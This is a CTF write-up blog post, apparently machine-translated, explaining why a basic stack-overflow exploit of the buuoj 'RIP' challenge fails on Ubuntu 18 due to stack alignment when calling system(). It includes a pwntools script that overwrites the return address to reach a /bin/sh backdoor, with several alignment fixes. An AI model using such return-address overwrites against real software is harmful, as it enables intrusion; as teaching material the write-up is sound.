Issues that may occur when calling system in 64-bit ELF in Ubuntu18 (「Pwn」Ubuntu18 中64位ELF在调用system时候可能出现的问题)

🤖AI Summary

nova在文章中探讨了在Ubuntu18系统上运行64位ELF文件时，调用system函数可能出现的问题。文章描述了一个CTF挑战题目，该题目比较简单，涉及基本的栈溢出攻击。然而，当作者在远程服务器上执行相同操作时却出错了，并在自己的Ubuntu18系统上也重现了此问题。

作者通过研究发现，Ubuntu18及以上版本的libc对64位ELF文件在调用system函数时需要考虑堆栈平衡。解决方法包括改变Payload的长度或者进行栈转移，从而避免堆栈不平衡的问题。

此外，作者希望进一步研究堆栈平衡问题并使用gdb进行分析，但由于Ubuntu18的gdb工具出现了问题，暂时无法进行深入探讨。最后，文章提供了一些参考博客，帮助读者进一步了解与该问题相关的技术细节。

Recently, when I set up Ubuntu18 and was testing it, I encountered a problem.

After researching for a long time, I finally solved it and decided to take some notes.

Challenge -- Buuoj -- RIP

Problem

This challenge is a basic stack overflow problem. There is a backdoor function that directly calls system("/bin/sh"); with no protections enabled. In theory, overwriting the return address should be sufficient.

Indeed, it worked fine during local testing, but issues arose during remote testing.

Upon further investigation, I discovered that when a 64-bit ELF program in Ubuntu18 or later calls the system function, stack balance needs to be considered in libc.

Solution

Changing the payload length or performing stack pivoting can resolve this issue.

The main idea is to change the stack address.

Here is an example exploit:

from pwn import *
context(log_level='debug', arch='amd64', os='linux')

# sh = process("./pwn1")
sh = remote("node4.buuoj.cn", 29726)

# sh.recvuntil('please input\n')

backdoor_addr = 0x0401186
# payload = b'a'*(0xf+8) + p64(backdoor_addr) # Normal idea, but due to alignment issues, it will fail
# payload = b'a'*0xf + p64(backdoor_addr) # Exploit 1, not very clear why this works:<
# payload = b'a'*(0xf+8) + p64(backdoor_addr) + p64(backdoor_addr - 1) # Exploit 2, backdoor_addr - 1 corresponds to a 'retn', can be replaced with others for stack balance
payload = b'a'*(0xf+8) + p64(backdoor_addr + 1) # Exploit 3, +1 aligns the address checked for alignment to 0x10 in call_system function
"""
It doesn't have to be +1. Aligning up to 16 times should work. If not, try stack pivoting.
"""
sh.sendline(payload)
sh.interactive()

In-depth Analysis

Here, I plan to delve into the stack at this point, which also serves as an initial exploration of gdb.

Oh no, it seems like gdb in Ubuntu18 is not working properly. I'll add more details once it's fixed:<

Reference Blogs

Issues with calling system function in some 64-bit glibc payloads

Stack balance issues involved in ret2text

Solving the program coredump issue caused by MOVAPS instruction after upgrading to gcc7.3

info

This Content is generated by ChatGPT and might be wrong / incomplete, refer to Chinese version if you find something wrong.